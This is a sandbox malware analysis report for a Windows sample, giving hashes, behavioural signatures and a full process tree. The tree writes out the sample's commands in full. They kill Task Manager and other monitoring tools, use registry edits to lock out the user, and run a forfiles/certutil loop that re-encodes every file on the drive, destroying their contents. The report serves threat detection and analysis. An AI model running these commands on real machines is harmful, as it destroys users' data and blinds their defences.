Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
09/01/2023, 11:08
General
-
Target
fifty50final.cmd.exe
-
Size
155KB
-
MD5
99e3c49edfa0934419a87adb9a1d99dd
-
SHA1
4c82fbdda744ce7ccf91e7f07b4ac2efffa68f19
-
SHA256
57ad72c7f7f87aeeff5eaf37d779a72d55a2876e3e95273311189b635b103c16
-
SHA512
2e4b876321e47c2ec98cfaf0989b0e023c3cac76b9e8e0812da975b2d75867041ade89ca7654d3354141c1c429f63d3f01cfe188f32c1013057908c5d3b689fa
-
SSDEEP
3072:XahKyd2n31i5GWp1icKAArDZz4N9GhbkrNEk1tT:XahOmp0yN90QEa
Score
8/10
Malware Config
Signatures
-
Disables Task Manager via registry modification
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Drops desktop.ini file(s) 35 IoCs
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Checks SCSI registry key(s) 3 TTPs 58 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Kills process with taskkill 64 IoCs
-
Modifies registry class 63 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 53 IoCs
-
Suspicious use of SendNotifyMessage 24 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\fifty50final.cmd.exe"C:\Users\Admin\AppData\Local\Temp\fifty50final.cmd.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\setup.cmd2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cscript.execscript //nologo C:\Users\Admin\AppData\Local\Temp\msg.vbs3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fifty50.cmd2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im ProcessHacker.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im procexp.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im procexp64.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im procmon.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im procmon64.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v NoLogoff /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "" /f3⤵
- Sets desktop wallpaper using registry
-
-
C:\Windows\system32\rundll32.exerundll32.exe user32.dll,UpdatePerUserSystemParameters3⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe3⤵
- Modifies Installed Components in the registry
- Drops desktop.ini file(s)
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\forfiles.exeforfiles /S /P C:\$Recycle.Bin /C "cmd /c if @isdir==FALSE attrib -s -h -r *.* & certutil -encode -f @file @file.20834 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "S-1-5-21-2295526160-1155304984-640977766-1000" "S-1-5-21-2295526160-1155304984-640977766-1000".20834 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "desktop.ini" "desktop.ini".20834 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\certutil.execertutil -encode -f "desktop.ini" "desktop.ini".208345⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\system32\forfiles.exeforfiles /S /P C:\ /C "cmd /c if @isdir==FALSE attrib -s -h -r *.* & certutil -encode -f @file @file.26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "$Recycle.Bin" "$Recycle.Bin".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Documents and Settings" "Documents and Settings".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "DumpStack.log.tmp" "DumpStack.log.tmp".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "DumpStack.log.tmp" "DumpStack.log.tmp".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "odt" "odt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "PerfLogs" "PerfLogs".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Program Files" "Program Files".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Program Files (x86)" "Program Files (x86)".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "ProgramData" "ProgramData".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Recovery" "Recovery".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "System Volume Information" "System Volume Information".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Users" "Users".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2010_x64.log-MSI_vc_red.msi.txt" "vcredist2010_x64.log-MSI_vc_red.msi.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2010_x64.log-MSI_vc_red.msi.txt" "vcredist2010_x64.log-MSI_vc_red.msi.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2010_x64.log.html" "vcredist2010_x64.log.html".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2010_x64.log.html" "vcredist2010_x64.log.html".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2010_x86.log-MSI_vc_red.msi.txt" "vcredist2010_x86.log-MSI_vc_red.msi.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2010_x86.log-MSI_vc_red.msi.txt" "vcredist2010_x86.log-MSI_vc_red.msi.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2010_x86.log.html" "vcredist2010_x86.log.html".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2010_x86.log.html" "vcredist2010_x86.log.html".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2012_x64_0_vcRuntimeMinimum_x64.log" "vcredist2012_x64_0_vcRuntimeMinimum_x64.log".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2012_x64_0_vcRuntimeMinimum_x64.log" "vcredist2012_x64_0_vcRuntimeMinimum_x64.log".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2012_x64_1_vcRuntimeAdditional_x64.log" "vcredist2012_x64_1_vcRuntimeAdditional_x64.log".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2012_x64_1_vcRuntimeAdditional_x64.log" "vcredist2012_x64_1_vcRuntimeAdditional_x64.log".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2012_x86_0_vcRuntimeMinimum_x86.log" "vcredist2012_x86_0_vcRuntimeMinimum_x86.log".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2012_x86_0_vcRuntimeMinimum_x86.log" "vcredist2012_x86_0_vcRuntimeMinimum_x86.log".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2012_x86_1_vcRuntimeAdditional_x86.log" "vcredist2012_x86_1_vcRuntimeAdditional_x86.log".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2012_x86_1_vcRuntimeAdditional_x86.log" "vcredist2012_x86_1_vcRuntimeAdditional_x86.log".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2013_x64_000_vcRuntimeMinimum_x64.log" "vcredist2013_x64_000_vcRuntimeMinimum_x64.log".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2013_x64_000_vcRuntimeMinimum_x64.log" "vcredist2013_x64_000_vcRuntimeMinimum_x64.log".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2013_x64_001_vcRuntimeAdditional_x64.log" "vcredist2013_x64_001_vcRuntimeAdditional_x64.log".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2013_x64_001_vcRuntimeAdditional_x64.log" "vcredist2013_x64_001_vcRuntimeAdditional_x64.log".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2013_x86_000_vcRuntimeMinimum_x86.log" "vcredist2013_x86_000_vcRuntimeMinimum_x86.log".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2013_x86_000_vcRuntimeMinimum_x86.log" "vcredist2013_x86_000_vcRuntimeMinimum_x86.log".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2013_x86_001_vcRuntimeAdditional_x86.log" "vcredist2013_x86_001_vcRuntimeAdditional_x86.log".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2013_x86_001_vcRuntimeAdditional_x86.log" "vcredist2013_x86_001_vcRuntimeAdditional_x86.log".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2022_x64_000_vcRuntimeMinimum_x64.log" "vcredist2022_x64_000_vcRuntimeMinimum_x64.log".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2022_x64_000_vcRuntimeMinimum_x64.log" "vcredist2022_x64_000_vcRuntimeMinimum_x64.log".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2022_x64_001_vcRuntimeAdditional_x64.log" "vcredist2022_x64_001_vcRuntimeAdditional_x64.log".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*6⤵
- Drops desktop.ini file(s)
- Drops file in Program Files directory
-
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2022_x64_001_vcRuntimeAdditional_x64.log" "vcredist2022_x64_001_vcRuntimeAdditional_x64.log".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2022_x86_000_vcRuntimeMinimum_x86.log" "vcredist2022_x86_000_vcRuntimeMinimum_x86.log".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2022_x86_000_vcRuntimeMinimum_x86.log" "vcredist2022_x86_000_vcRuntimeMinimum_x86.log".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2022_x86_001_vcRuntimeAdditional_x86.log" "vcredist2022_x86_001_vcRuntimeAdditional_x86.log".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2022_x86_001_vcRuntimeAdditional_x86.log" "vcredist2022_x86_001_vcRuntimeAdditional_x86.log".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows" "Windows".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "S-1-5-21-2295526160-1155304984-640977766-1000" "S-1-5-21-2295526160-1155304984-640977766-1000".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "desktop.ini" "desktop.ini".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\certutil.execertutil -encode -f "desktop.ini" "desktop.ini".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "desktop.ini.20834" "desktop.ini.20834".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\certutil.execertutil -encode -f "desktop.ini.20834" "desktop.ini.20834".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "config.xml" "config.xml".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "config.xml" "config.xml".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "office2016setup.exe" "office2016setup.exe".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "office2016setup.exe" "office2016setup.exe".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "7-Zip" "7-Zip".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "AssertMerge.ttf" "AssertMerge.ttf".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "AssertMerge.ttf" "AssertMerge.ttf".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "BlockGet.wps" "BlockGet.wps".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\certutil.execertutil -encode -f "BlockGet.wps" "BlockGet.wps".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "CheckpointBlock.pptm" "CheckpointBlock.pptm".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "CheckpointRegister.wdp" "CheckpointRegister.wdp".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\certutil.execertutil -encode -f "CheckpointRegister.wdp" "CheckpointRegister.wdp".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
